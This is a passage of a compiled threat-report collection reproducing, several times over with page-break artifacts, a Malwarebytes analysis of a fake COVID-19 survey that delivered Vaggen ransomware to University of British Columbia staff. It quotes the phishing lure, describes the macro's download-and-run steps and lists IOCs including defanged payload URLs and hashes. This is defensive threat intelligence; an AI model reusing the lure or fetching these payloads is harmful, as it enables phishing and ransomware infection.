3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 522 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 523 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 524 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 525 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 526 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 527 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 528 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 529 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 530 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 531 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 532 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 533 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 534 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 535 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 536 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 537 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 538 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 539 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 540 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 541 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 542 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 543 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 544 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 545 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 546 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 547 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 548 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 549 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 550 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 551 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 552 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 553 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 554 of 